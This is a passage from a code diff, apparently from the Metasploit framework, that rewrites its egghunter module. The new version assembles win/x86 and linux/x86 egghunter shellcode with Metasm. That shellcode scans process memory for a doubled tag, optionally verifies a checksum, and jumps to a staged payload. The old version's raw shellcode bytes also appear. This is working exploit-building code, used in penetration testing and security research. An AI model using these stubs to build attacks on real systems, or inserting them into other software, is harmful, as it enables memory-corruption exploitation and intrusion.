+	# There really isn't any need to combine them. Also, the ms01_026 exploit depends on
+	# the start command being issued separately so that it can ignore it :)
+	attr_reader :payload_exe
 end
 end
 end

data/lib/rex/exploitation/cmdstager/vbs.rb CHANGED

File without changes

data/lib/rex/exploitation/egghunter.rb CHANGED

@@ -12,6 +12,13 @@ module Exploitation
 # overflow occurs, but it's possible to stick a larger payload somewhere else
 # in memory that may not be directly predictable.
 #
+# Original implementation by skape
+# (See http://www.hick.org/code/skape/papers/egghunt-shellcode.pdf)
+#
+# Checksum checking implemented by dijital1/corelanc0d3r
+# Checksum code merged to Egghunter by jduck
+# Conversion to use Metasm by jduck
+#
 ###
 class Egghunter
@@ -29,21 +36,51 @@ class Egghunter
 			#
 			# The egg hunter stub for win/x86.
 			#
-			def hunter_stub
-				{
-					'Stub' =>
-						"\x66\x81\xca\xff\x0f\x42\x52\x6a\x02" +
-						"\x58\xcd\x2e\x3c\x05\x5a\x74\xef\xb8" +
-						"\x41\x41\x41\x41" +
-						"\x8b\xfa\xaf\x75\xea\xaf\x75\xe7\xff\xe7",
-					'EggSize'   => 4,
-					'EggOffset' => 0x12
-				}
+			def hunter_stub(payload, badchars = '', opts = {})
+				raise RuntimeError, "Invalid egg string! Need #{esize} bytes." if opts[:eggtag].length != 4
+				marker = "0x%x" % opts[:eggtag].unpack('V').first
+				checksum = checksum_stub(payload, badchars, opts)
+				assembly = <<EOS
+check_readable:
+	or dx,0xfff
+next_addr:
+	inc edx
+	push edx
+	push 0x02   ; use NtAccessCheckAndAuditAlarm syscall
+	pop eax
+	int 0x2e
+	cmp al,5
+	pop edx
+	je check_readable
+check_for_tag:
+	; check that the tag matches once
+	mov eax,#{marker}
+	mov edi,edx
+	scasd
+	jne next_addr
+	; it must match a second time too
+	scasd
+	jne next_addr
+	; check the checksum if the feature is enabled
+#{checksum}
+	; jump to the payload
+	jmp edi
+EOS
+				assembled_code = Metasm::Shellcode.assemble(Metasm::Ia32.new, assembly).encode_string
+				# return the stub
+				assembled_code
 			end
 		end
 	end
 	###
 	#
 	# Linux-based egghunters
@@ -58,16 +95,46 @@ class Egghunter
 			#
 			# The egg hunter stub for linux/x86.
 			#
-			def hunter_stub
-				{
-					'Stub' =>
-						"\xfc\x66\x81\xc9\xff\x0f\x41\x6a\x43\x58\xcd\x80" +
-						"\x3c\xf2\x74\xf1\xb8" +
-						"\x41\x41\x41\x41" +
-						"\x89\xcf\xaf\x75\xec\xaf\x75\xe9\xff\xe7",
-					'EggSize'   => 4,
-					'EggOffset' => 0x11
-				}
+			def hunter_stub(payload, badchars = '', opts = {})
+				raise RuntimeError, "Invalid egg string! Need #{esize} bytes." if opts[:eggtag].length != 4
+				marker = "0x%x" % opts[:eggtag].unpack('V').first
+				checksum = checksum_stub(payload, badchars, opts)
+				assembly = <<EOS
+	cld
+check_readable:
+	or cx,0xfff
+next_addr:
+	inc ecx
+	push 0x43   ; use 'sigaction' syscall
+	pop eax
+	int 0x80
+	cmp al,0xf2
+	je check_readable
+check_for_tag:
+	; check that the tag matches once
+	mov eax,#{marker}
+	mov edi,ecx
+	scasd
+	jne next_addr
+	; it must match a second time too
+	scasd
+	jne next_addr
+	; check the checksum if the feature is enabled
+#{checksum}
+	; jump to the payload
+	jmp edi
+EOS
+				assembled_code = Metasm::Shellcode.assemble(Metasm::Ia32.new, assembly).encode_string
+				# return the stub
+				assembled_code
 			end
 		end
@@ -88,7 +155,7 @@ class Egghunter
 		Egghunter.constants.each { |c|
 			mod = self.class.const_get(c)
-			next if ((!mod.kind_of?(::Module)) or
+			next if ((!mod.kind_of?(::Module)) or
 			         (!mod.const_defined?('Alias')))
 			if (platform =~ /#{mod.const_get('Alias')}/i)
@@ -98,7 +165,7 @@ class Egghunter
 					mod.constants.each { |a|
 						amod = mod.const_get(a)
-						next if ((!amod.kind_of?(::Module)) or
+						next if ((!amod.kind_of?(::Module)) or
 						         (!amod.const_defined?('Alias')))
 						if (arch =~ /#{mod.const_get(a).const_get('Alias')}/i)
@@ -115,17 +182,29 @@ class Egghunter
 	#
 	# This method generates an egghunter using the derived hunter stub.
 	#
-	def generate(badchars = '')
-		return nil if ((opts = hunter_stub) == nil)
-		stub  = opts['Stub'].dup
-		esize = opts['EggSize']
-		eoff  = opts['EggOffset']
-		egg   = Rex::Text.rand_text(esize, badchars)
-		stub[eoff, esize] = egg
+	def generate(payload, badchars = '', opts = {})
+		# set defaults if options are missing
+		# NOTE: there is no guarantee this won't exist in memory, even when doubled.
+		# To address this, use the checksum feature :)
+		opts[:eggtag] ||= Rex::Text.rand_text(4, badchars)
+		# Generate the hunter_stub portion
+		return nil if ((hunter = hunter_stub(payload, badchars, opts)) == nil)
+		# Generate the marker bits to be prefixed to the real payload
+		egg = ''
+		egg << opts[:eggtag] * 2
+		egg << payload
+		if opts[:checksum]
+			cksum = 0
+			payload.each_byte { |b|
+				cksum += b
+			}
+			egg << [cksum & 0xff].pack('C')
+		end
-		return [ stub, egg ]
+		return [ hunter, egg ]
 	end
 protected
@@ -134,10 +213,38 @@ protected
 	# Stub method that is meant to be overridden.  It returns the raw stub that
 	# should be used as the egghunter.
 	#
-	def hunter_stub
+	def hunter_stub(payload, badchars = '', opts = {})
+	end
+	def checksum_stub(payload, badchars = '', opts = {})
+		return '' if not opts[:checksum]
+		if payload.length < 0x100
+			cmp_reg = "cl"
+		elsif payload.length < 0x10000
+			cmp_reg = "cx"
+		else
+			raise RuntimeError, "Payload too big!"
+		end
+		egg_size = "0x%x" % payload.length
+		checksum = <<EOS
+	push ecx
+	xor ecx,ecx
+	xor eax,eax
+calc_chksum_loop:
+	add al,byte [edi+ecx]
+	inc ecx
+	cmp #{cmp_reg},#{egg_size}
+	jnz calc_chksum_loop
+test_chksum:
+	cmp al,byte [edi+ecx]
+	pop ecx
+	jnz next_addr
+EOS
 	end
 end
 end
-end
+end